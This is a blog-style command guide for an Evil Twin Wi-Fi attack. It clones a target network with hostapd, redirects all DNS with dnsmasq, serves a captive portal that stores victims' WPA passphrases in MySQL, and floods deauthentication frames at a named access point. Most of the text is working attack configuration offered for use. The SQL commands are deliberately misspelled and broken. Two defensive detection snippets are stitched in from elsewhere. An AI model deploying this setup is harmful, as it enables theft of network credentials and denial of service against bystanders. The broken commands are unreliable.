d3adR1nger

Evil Twin Attack with Captive Portal For WiFi Credentials Theft | Command Gist

Dec 03, 2020

Yesterday on sudorealm I posted a guide for the Evil Twin attack!

Guide Contents

The guide covers:

  • Simple Reconnaissance.

  • Setting up your own Access Point with hostapd.

  • Distribute IPs to connected hosts with dnsmasq.

  • Provide connected users with internet access using iptables.

  • Write your own rewrite rules in the Apache2 configuration.

  • Setup a cool captive portal, with modern Front-End techniques

    • Bootstrap

    • jQuery

    • Client-Side Form validation with Parsley.js Library

  • Store credentials in a local MySQL database


You are more than welcome to comment with your thoughts, any ideas you have for the project, and more.

You can clone the project and start playing around immediately.

git clone https://github.com/athanstan/EvilTwin_AP_CaptivePortal.git

Feel free to contribute whatever the hell you want! This is why open source exists! 🤘

Also since you are here! This is my Spotify playlist that I listen to whenever I am coding and hacking! So enjoy 😄🎧🎶

Commands for attack setup

Install dnsmasq

apt-get install dnsmasq -y


Install hostapd

apt-get install hostapd


Put the wireless adapter into monitor mode

airmon-ng start wlan0

Setup dnsmasq.conf

touch dnsmasq.conf

And paste inside the following lines:

#Set the wifi interface
interface=wlan0mon

#Set the IP range that can be given to clients
dhcp-range=10.0.0.10,10.0.0.100,255.255.255.0,8h

#Set the gateway IP address
dhcp-option=3,10.0.0.1

#Set DNS server address
dhcp-option=6,10.0.0.1

#Set Server
server=8.8.8.8

#logs
log-queries
log-dhcp

#Redirect all requests to 10.0.0.1
address=/#/10.0.0.1
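
Added example (not part of the original guide or its repository): the address=/#/10.0.0.1 line makes every hostname, even one that cannot exist, resolve to the same private address, and a client can test for exactly that. The probe names and the pluggable resolve function are assumptions of this sketch so it can be exercised offline.

```python
import ipaddress
import secrets
import socket

# Assumption: arbitrary, unrelated public hostnames used only as probes.
PROBE_NAMES = ["example.com", "example.org", "example.net"]


def system_resolver(name):
    """Resolve a name to its set of IPv4 addresses using the OS resolver."""
    try:
        infos = socket.getaddrinfo(name, None, socket.AF_INET)
    except socket.gaierror:
        return set()  # NXDOMAIN or no answer
    return {info[4][0] for info in infos}


def check_dns_hijack(resolve=system_resolver, probes=PROBE_NAMES):
    """Return (verdict, reasons); verdict is "hijacked" or "ok"."""
    # A random label under the reserved .invalid TLD must never resolve.
    canary = f"{secrets.token_hex(8)}.invalid"
    canary_ips = resolve(canary)
    answers = {name: resolve(name) for name in probes}
    all_ips = set().union(*answers.values())

    reasons = []
    if canary_ips:
        reasons.append(f"nonexistent name resolved to {sorted(canary_ips)}")
    if len(probes) > 1 and all(answers.values()) and len(all_ips) == 1:
        reasons.append(f"all probes resolved to one address {sorted(all_ips)}")
    private = sorted(ip for ip in all_ips | canary_ips
                     if ipaddress.ip_address(ip).is_private)
    if private:
        reasons.append(f"public names resolved to private address(es) {private}")
    return ("hijacked" if reasons else "ok"), reasons
```

A "hijacked" verdict means DNS is being intercepted on this network; a legitimate hotel or airport portal trips it too, so treat it as a cue not to type any Wi-Fi passphrase into a web page.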


Setup hostapd.conf

After you have found your target AP with airodump-ng wlan0mon, type touch hostapd.conf to create the file and paste the following lines inside:

interface=wlan0mon
driver=nl80211
ssid=neighborAP
hw_mode=g
channel=8
macaddr_acl=0
ignore_broadcast_ssid=0
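
Added example (not from the original guide or its repository): the hostapd.conf above has no WPA settings, so the twin shows up as an open network reusing a known SSID, which is what a site survey can look for. The baseline, the Beacon record layout and the MAC addresses below are constructed for illustration.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Beacon:
    ssid: str
    bssid: str
    channel: int
    security: str  # "open", "wpa2" or "wpa3"


# Constructed baseline: the APs you actually operate, per SSID.
KNOWN = {
    "neighborAP": {"bssids": {"02:00:00:00:00:01": 8}, "security": "wpa2"},
}

# Constructed scan results, e.g. transcribed from a wireless survey.
SAMPLE_SCAN = [
    Beacon("neighborAP", "02:00:00:00:00:01", 8, "wpa2"),  # the real AP
    Beacon("neighborAP", "02:00:00:00:00:99", 8, "open"),  # open clone
    Beacon("neighborAP", "02:00:00:00:00:01", 1, "wpa2"),  # BSSID moved channel
    Beacon("otherNet", "02:00:00:00:00:55", 6, "open"),    # not our SSID
]


def find_rogue_aps(beacons, known):
    """Return [(beacon, reasons)] for beacons that reuse a known SSID
    but do not match the recorded BSSID, channel or security mode."""
    findings = []
    for b in beacons:
        profile = known.get(b.ssid)
        if profile is None:
            continue  # SSID is not one we are responsible for
        reasons = []
        bssid = b.bssid.lower()
        if bssid not in profile["bssids"]:
            reasons.append("unknown BSSID")
        elif profile["bssids"][bssid] != b.channel:
            reasons.append("known BSSID on unexpected channel")
        if b.security != profile["security"]:
            reasons.append(f"security {b.security}, expected {profile['security']}")
        if reasons:
            findings.append((b, reasons))
    return findings
```

A channel mismatch alone can be a legitimate auto-channel change; an unknown BSSID combined with a downgrade to open is the strong signal.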


Setup iptables rules

First, create the file with touch iptablesRules.sh and then paste the following lines inside:

iptables --flush
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE 
iptables --append FORWARD --in-interface wlan0mon -j ACCEPT 
iptables -t nat -A POSTROUTING -j MASQUERADE
echo 1 > /proc/sys/net/ipv4/ip_forward

Now type chmod +x iptablesRules.sh to be able to run it with ./iptablesRules.sh


Setup Apache2 Rewrite Rules

You need to add some directives to the Apache2 configuration file, which on Kali is at /etc/apache2/sites-enabled/000-default.conf. Once you have found it, open it with gedit and paste the following chunk under the </VirtualHost> tag:

<Directory "/var/www/html">
	RewriteEngine On
	RewriteBase /
	RewriteCond %{HTTP_HOST} ^www\.(.*)$ [NC]
	RewriteRule ^(.*)$ http://%1/$1 [R=301,L]
	
	RewriteCond %{REQUEST_FILENAME} !-f
	RewriteCond %{REQUEST_FILENAME} !-d
	RewriteRule ^(.*)$ / [L,QSA]
</Directory>

And then run a2enmod rewrite

Setup the code for the Captive Portal

Copy the files of the captive portal you want to serve into /var/www/html, then start the server with service apache2 start

Setup MySQL Database

For your connection with the Captive Portal you need a Database with the following settings:

Start MySQL Service
⚠ Be careful, simple copy-pasting is dangerous! So I intentionally added some typos in my MySQL syntax. 🔎 Let's play find the bug 🐞

service mysql start

Then run mysql -u root -p to log in as root (when prompted for the password, just press Enter). You will create a new user, but first:

Create the Database

MariaDB [(none)]>cretae database eviltwin; 
Query OK, 1 row affected (0.000 sec)

MariaDB [(none)]> use eviltwin;
Database changed


Create a new user and grant him all privileges for the DB

MariaDB [(none)]>cretae user dodgers@localhost identfied by 'duck';
Query OK, 0 rows affected (0.000 sec)

MariaDB [(none)]> grant all priviledges on eviltwin.* to 'dodgers'@ 'localhost';
Query OK, 0 rows affected (0.000 sec)

Create the table

MariaDB [eviltwin]>cretae table wpa_keys(password1 varhcar(32), password2 varhcar(32));
Query OK, 0 rows affected (0.015 sec)

MariaDB [eviltwin]> show tables;
+--------------------------+
| Hidden_NSA_Exploits      |
+--------------------------+
| s3cretsSn0wdendoesntKnow |
+--------------------------+
| wpa_keys                 |
+--------------------------+

Done. You can now interact with the Captive portal with no problems! If you have followed everything correctly that is. 🤓

Deployment Phase


Allocate IP and Subnet mask

ifconfig wlan0mon up 10.0.0.1 netmask 255.255.255.0

Add Routing table

route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1

Forward Traffic

./iptablesRules.sh

Turn on the Fake Access Point

hostapd hostapd.conf

Enable dnsmasq

dnsmasq -C dnsmasq.conf -d


Bonus Section

After you have successfully connected your second wireless adapter, put it on monitor mode and then type:

aireplay-ng -0 0 -a 00:1D:1C:FD:64:AB wlan1mon

To deauthenticate your target AP and leave him unauthenticated until he falls for your trap! 😈😈😈

The End. Have fun, play around, become better, and don't hack without consent. This is serious, guys: you could end up in jail.

Learn to Hack, then Hack to learn more!

D3ad_R1nger out. 💨

About Comments

If you don't like commenting, here are some alternatives for us to chat:

🤖 https://www.reddit.com/user/stantz16

🐥 https://twitter.com/DevThanos

🤵 https://www.linkedin.com/in/athanasios-stantzouris-34ba44141/

Thanks, y'all 🎉🎈🥳
